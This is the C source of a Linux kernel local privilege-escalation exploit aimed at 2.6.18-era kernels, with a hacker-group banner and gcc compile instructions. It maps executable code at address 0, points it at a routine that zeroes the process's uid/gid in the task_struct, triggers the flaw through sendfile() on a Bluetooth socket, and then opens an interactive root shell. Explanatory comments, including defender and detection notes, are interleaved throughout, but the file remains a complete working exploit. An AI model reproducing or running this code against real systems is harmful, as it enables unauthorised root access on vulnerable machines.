  1. LOcal Root Exploit 2.6.18 2011 by http://www.hackerscafe.in/
  2.  
  3.  
  4. /*
  5. *
  6. *
  7. * 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
  8. * 0 _ __ __ __ 1
  9. * 1 /' \ __ /'__`\ /\ \__ /'__`\ 0
  10. * 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
  11. * 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
  12. * 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
  13. * 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
  14. * 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
  15. * 1 \ \____/ >> Exploit database separated by exploit 0
  16. * 0 \/___/ type (local, remote, DoS, etc.) 1
  17. * 1 0
  18. * 0 By CrosS 1
  19. * 1 0
  20. * 0 Linux 2011 1
  21. * 1 0
  22. * -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
  23. *
  24. * Linux 2.6.18-128.el5
  25. * Linux 2.6.9-89.EL
  26. * Ubuntu 8.10 Linux 2.6.27
  27. *
  28. * For i386 & ppc compile with the command;
  29. * gcc -w -o exploit exploit.c
  30. *
  31. * For x86_64 kernel and ppc64 Compile as;
  32. * gcc -w -m64 -o exploit exploit.c
  33. *
  34. * Greetz: r0073r( 1337day.com ),r4dc0re,side^effects and all members of 1337day Team ) ..... & all members of r00tw0rm.com ( RW ) .. )
  35. *
  36. * Submit Your Exploit at [email protected] | [email protected]
  37. *
  38. * For Educational purpose Only))
  39. */
  40.  
  41. #include <stdio.h>
  42. #include <stdlib.h>
  43. #include <string.h>
  44. #include <sys/mman.h>
  45. #include <sys/sendfile.h>
  46. #include <sys/types.h>
  47. #include <sys/socket.h>
  48. #include <unistd.h>
  49.  
  50. #if !defined(__always_inline)
  51. #define __always_inline inline __attribute__((always_inline))
  52. #endif
  53.  
  54. #if defined(__i386__) || defined(__x86_64__)
  55. #if defined(__LP64__)
/*
 * Return the caller's stack pointer (x86_64: %rsp).
 *
 * Nothing else in this file calls this LP64 variant: the x86_64
 * current_task_struct() below reads %gs:0 instead.  It is the 32-bit x86
 * and PowerPC variants of current_task_struct() that derive the task
 * pointer from the stack pointer by masking.
 */
static __always_inline unsigned long
current_stack_pointer(****)
{
    unsigned long sp;

    asm volatile ("movq %%rsp,%0; " : "=r" (sp));

    return sp;
}
  65.  
  66. #else
/*
 * Return the caller's stack pointer (32-bit x86: %esp).
 *
 * current_task_struct() below masks this value down to a stack-size
 * boundary and treats the result as a kernel thread_info/task_struct.
 * That only makes sense if the caller is already executing on a kernel
 * stack; in ordinary user-mode execution the value is simply the
 * process's own user stack pointer.
 */
static __always_inline unsigned long
current_stack_pointer(****)
{
    unsigned long sp;

    asm volatile ("movl %%esp,%0" : "=r" (sp));

    return sp;
}
  76.  
  77. #endif
  78.  
  79. #elif defined(__powerpc__) || defined(__powerpc64__)
/*
 * Return the caller's stack pointer (PowerPC: r1 is the stack pointer
 * register in the PowerPC ABIs, both 32- and 64-bit).
 *
 * Consumed by the PowerPC current_task_struct() below, which masks it to
 * the kernel stack size; as with the x86 variants the result is only a
 * kernel task pointer if this runs on a kernel stack.
 */
static __always_inline unsigned long
current_stack_pointer(****)
{
    unsigned long sp;

    asm volatile ("mr %0,%%r1; " : "=r" (sp));

    return sp;
}
  89.  
  90. #endif
  91.  
  92. #if defined(__i386__) || defined(__x86_64__)
  93. #if defined(__LP64__)
/*
 * Return the address of the current task_struct on x86_64.
 *
 * Reads the word at %gs:0.  Nothing here validates the result: in user
 * mode this is whatever the process's GS base happens to point at, and
 * the value is only the kernel's current-task pointer if the read happens
 * on a kernel stack with the kernel's GS base installed — NOTE(review):
 * that per-CPU layout is an assumption about the target kernel, not
 * something this file checks.
 */
static __always_inline unsigned long
current_task_struct(****)
{
    unsigned long task_struct;

    asm volatile ("movq %%gs:(0),%0; " : "=r" (task_struct));

    return task_struct;
}
  103.  
  104. #else
  105. #define TASK_RUNNING 0
  106.  
/*
 * Locate the current task_struct on 32-bit x86 by masking the stack
 * pointer, trying the layouts of successive kernel generations in turn.
 *
 * Every probe below is a raw read through an address computed from the
 * stack pointer.  If this is not executing on a kernel stack the reads
 * land on the caller's own user stack (or fault), and the TASK_RUNNING
 * checks are expected to fail.
 *
 * Returns (unsigned long)-1 when no candidate matches.  Caller beware:
 * change_cred() casts the result to a pointer and tests it with
 * `while (task_struct)`, so this failure value is NOT detected there.
 */
static __always_inline unsigned long
current_task_struct(****)
{
    unsigned long task_struct, thread_info;

    /* 2.6 layout: a 4 KiB-aligned thread_info whose first word is the
     * task pointer. */
    thread_info = current_stack_pointer() & ~(4096 - 1);

    /* 0xc0000000 is the default i386 user/kernel split; a word at or above
     * it is taken to be a kernel pointer (a non-default split would break
     * this test). */
    if (*(unsigned long *)thread_info >= 0xc0000000) {
        task_struct = *(unsigned long *)thread_info;

        /*
         * TASK_RUNNING is the only possible state for a process that is
         * executing in user space, so the first word of a genuine
         * task_struct must be 0 here.
         */
        if (*(unsigned long *)task_struct == TASK_RUNNING)
            return task_struct;
    }

    /*
     * Prior to the 2.6 kernel series, the task_struct was stored at the end
     * of the kernel stack (8 KiB stacks).
     */
    task_struct = current_stack_pointer() & ~(8192 - 1);

    if (*(unsigned long *)task_struct == TASK_RUNNING)
        return task_struct;

    /* Last attempt: treat the 8 KiB-aligned base as a thread_info whose
     * first word is the task pointer. */
    thread_info = task_struct;

    task_struct = *(unsigned long *)thread_info;

    if (*(unsigned long *)task_struct == TASK_RUNNING)
        return task_struct;

    return -1;
}
  143.  
  144. #endif
  145.  
  146. #elif defined(__powerpc__) || defined(__powerpc64__)
  147. #define TASK_RUNNING 0
  148.  
/*
 * Locate the current task_struct on PowerPC by masking the stack pointer
 * to the kernel stack size (16 KiB on 64-bit, 8 KiB on 32-bit).  The base
 * is first tried as the task_struct itself (first word == TASK_RUNNING,
 * the only state a process executing in user space can be in), then as a
 * thread_info whose first word points at the task_struct.
 *
 * Each probe is a raw read through an address derived from the stack
 * pointer, so this only yields a kernel task pointer when executed on a
 * kernel stack.  Returns (unsigned long)-1 on failure; change_cred()
 * casts that to a pointer and tests `while (task_struct)`, so the failure
 * value passes as a valid non-NULL pointer there.
 */
static __always_inline unsigned long
current_task_struct(****)
{
    unsigned long task_struct, thread_info;

#if defined(__LP64__)
    task_struct = current_stack_pointer() & ~(16384 - 1);

#else
    task_struct = current_stack_pointer() & ~(8192 - 1);

#endif

    if (*(unsigned long *)task_struct == TASK_RUNNING)
        return task_struct;

    /* Base was not a task_struct; treat it as a thread_info instead. */
    thread_info = task_struct;

    task_struct = *(unsigned long *)thread_info;

    if (*(unsigned long *)task_struct == TASK_RUNNING)
        return task_struct;

    return -1;
}
  174.  
  175. #endif
  176.  
  177. #if defined(__i386__) || defined(__x86_64__)
/* The caller's real uid/gid, captured in main() before anything else
 * runs; change_cred() searches the task_struct for this pair. */
static unsigned long uid, gid;

/*
 * Payload (x86 variant): overwrite the current task's credentials with 0.
 *
 * Starting at the address returned by current_task_struct(), scan forward
 * one 32-bit word at a time for four copies of uid followed by four copies
 * of gid, and zero all eight.  Presumably the uid/euid/suid/fsuid and
 * gid/egid/sgid/fsgid members of a 2.6-era task_struct — the layout is
 * assumed, not verified by anything in this file.
 *
 * This only has its intended effect if it executes in kernel context,
 * which is what the mapping at address 0 built in main() is for.  Caveats
 * visible in the code itself:
 *   - the loop ends only on a match or when the pointer wraps to NULL, so
 *     if the pattern is absent it reads memory until it faults (on a
 *     kernel stack that is a crash, i.e. a denial of service);
 *   - the (unsigned long)-1 failure value of current_task_struct() is a
 *     non-NULL pointer after the cast and is therefore not recognised;
 *   - the -1 return value is never examined by anything in this file.
 *
 * Defender's note: the observable effect on an affected kernel is a
 * process whose uid/gid become 0 with no setuid/setgid syscall and no
 * set-id exec in between.
 */
static int
change_cred(****)
{
    unsigned int *task_struct;

    task_struct = (unsigned int *)current_task_struct();

    while (task_struct) {
        if (task_struct[0] == uid && task_struct[1] == uid &&
            task_struct[2] == uid && task_struct[3] == uid &&
            task_struct[4] == gid && task_struct[5] == gid &&
            task_struct[6] == gid && task_struct[7] == gid) {
            task_struct[0] = task_struct[1] =
            task_struct[2] = task_struct[3] =
            task_struct[4] = task_struct[5] =
            task_struct[6] = task_struct[7] = 0;
            break;
        }

        task_struct++;
    }

    return -1;
}
  204.  
  205. #elif defined(__powerpc__) || defined(__powerpc64__)
/*
 * Payload (PowerPC variant): overwrite the current task's credentials
 * with 0.
 *
 * Unlike the x86 version this does not know the caller's uid/gid (those
 * globals are only declared in the x86 branch).  Instead it scans forward
 * from the task_struct one 32-bit word at a time, skipping zero words,
 * for a non-zero word repeated four times followed by any word repeated
 * four times, and zeroes all eight.  Presumably the uid×4 / gid×4 run of
 * a 2.6-era task_struct — layout assumed, not verified here.  Because the
 * match does not compare against the real ids, a zero gid is accepted
 * while a zero uid is skipped.
 *
 * Same caveats as the code shows: the scan is unbounded (it ends only on
 * a match or when the pointer wraps to NULL, otherwise it faults), the
 * (unsigned long)-1 failure value of current_task_struct() survives the
 * cast as a non-NULL pointer, and the return value is never used.  Only
 * meaningful when executed in kernel context.
 */
static int
change_cred(****)
{
    unsigned int *task_struct;

    task_struct = (unsigned int *)current_task_struct();

    while (task_struct) {
        if (!task_struct[0]) {
            task_struct++;
            continue;
        }

        if (task_struct[0] == task_struct[1] &&
            task_struct[0] == task_struct[2] &&
            task_struct[0] == task_struct[3] &&
            task_struct[4] == task_struct[5] &&
            task_struct[4] == task_struct[6] &&
            task_struct[4] == task_struct[7]) {
            task_struct[0] = task_struct[1] =
            task_struct[2] = task_struct[3] =
            task_struct[4] = task_struct[5] =
            task_struct[6] = task_struct[7] = 0;
            break;
        }

        task_struct++;
    }

    return -1;
}
  237.  
  238. #endif
  239.  
/* Page size, used for the temp file length and the sendfile() count. */
#define PAGE_SIZE getpagesize()

/*
 * Entry point.  Sequence, as written:
 *   1. record the caller's uid/gid (x86 only; consumed by change_cred());
 *   2. map one RWX page at address 0 with MAP_FIXED and write a small
 *      stub into it that transfers control to change_cred();
 *   3. open a PF_BLUETOOTH datagram socket, create and unlink a temp file
 *      truncated to PAGE_SIZE, and sendfile() that file into the socket;
 *   4. exec an interactive /bin/sh.
 *
 * Step 2 is the part a hardened system refuses: with vm.mmap_min_addr
 * enforced (mainstream distributions enable it by default) the MAP_FIXED
 * request at NULL fails for an unprivileged caller and the program exits
 * at the perror() below.  Steps 2 and 3 together are also a clear
 * detection signal — an unprivileged process mapping page 0 executable,
 * then opening a Bluetooth datagram socket and calling sendfile() on it.
 *
 * Unchecked in the code: the return values of sendfile() and execl().  A
 * shell is therefore spawned regardless of whether step 3 did anything,
 * and the final exit(EXIT_SUCCESS) is reached only when execl() has
 * failed (it does not return on success).  mmap() is passed fd 0 rather
 * than -1 for an anonymous mapping, which Linux tolerates but is not
 * portable.  The unsigned long / unsigned short stores through &addr[n]
 * are unaligned type-punned writes.
 */
int
main(****)
{
    char *addr;
    int out_fd, in_fd;
    char template[] = "/tmp/tmp.XXXXXX";

#if defined(__i386__) || defined(__x86_64__)
    /* Real ids of the caller; change_cred() searches the task_struct
     * for this exact pair. */
    uid = getuid(), gid = getgid();

#endif

    /* One RWX page at address 0.  This is the call vm.mmap_min_addr
     * exists to refuse; when it is enforced the program stops here. */
    if ((addr = mmap(NULL, 0x1000, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_FIXED|
                     MAP_PRIVATE|MAP_ANONYMOUS, 0, 0)) == MAP_FAILED) {
        perror("mmap");
        exit(EXIT_FAILURE);
    }

#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
    /* Stub at address 0: change_cred's address is stored at offset 8 and
     * the leading bytes transfer control through that slot. */
    addr[0] = '\xff';
    addr[1] = '\x24';
    addr[2] = '\x25';
    *(unsigned long *)&addr[3] = 8;
    *(unsigned long *)&addr[8] = (unsigned long)change_cred;

#else
    /* 32-bit form of the same stub; slot at offset 8 again. */
    addr[0] = '\xff';
    addr[1] = '\x25';
    *(unsigned long *)&addr[2] = 8;
    *(unsigned long *)&addr[8] = (unsigned long)change_cred;

#endif

#elif defined(__powerpc__) || defined(__powerpc64__)
#if defined(__LP64__)
    /*
     * The use of function descriptors by the Power 64-bit ELF ABI requires
     * the use of a fake function descriptor: the first word of
     * change_cred's real descriptor is copied to address 0.
     */
    *(unsigned long *)&addr[0] = *(unsigned long *)change_cred;

#else
    /* Hand-assembled 32-bit PowerPC stub; change_cred's address is
     * stored in two 16-bit halves at offsets 2 and 6 (presumably loaded
     * and branched to by the surrounding instruction bytes — not
     * disassembled here). */
    addr[0] = '\x3f';
    addr[1] = '\xe0';
    *(unsigned short *)&addr[2] = (unsigned short)change_cred>>16;
    addr[4] = '\x63';
    addr[5] = '\xff';
    *(unsigned short *)&addr[6] = (unsigned short)change_cred;
    addr[8] = '\x7f';
    addr[9] = '\xe9';
    addr[10] = '\x03';
    addr[11] = '\xa6';
    addr[12] = '\x4e';
    addr[13] = '\x80';
    addr[14] = '\x04';
    addr[15] = '\x20';

#endif

#endif

    /* Bluetooth datagram socket: the destination of the sendfile() below. */
    if ((out_fd = socket(PF_BLUETOOTH, SOCK_DGRAM, 0)) == -1) {
        perror("socket");
        exit(EXIT_FAILURE);
    }

    /* Anonymous temp file (created, then immediately unlinked) sized to
     * one page; it is only the source side of the sendfile() call. */
    if ((in_fd = mkstemp(template)) == -1) {
        perror("mkstemp");
        exit(EXIT_FAILURE);
    }

    if(unlink(template) == -1) {
        perror("unlink");
        exit(EXIT_FAILURE);
    }

    if (ftruncate(in_fd, PAGE_SIZE) == -1) {
        perror("ftruncate");
        exit(EXIT_FAILURE);
    }

    /* Trigger.  Return value ignored: on a kernel that rejects this the
     * program simply carries on to the exec below. */
    sendfile(out_fd, in_fd, NULL, PAGE_SIZE);

    /* Replaces the process with an interactive shell; only returns on
     * failure, in which case the exit status below is misleadingly 0. */
    execl("/bin/sh", "sh", "-i", NULL);

    exit(EXIT_SUCCESS);
}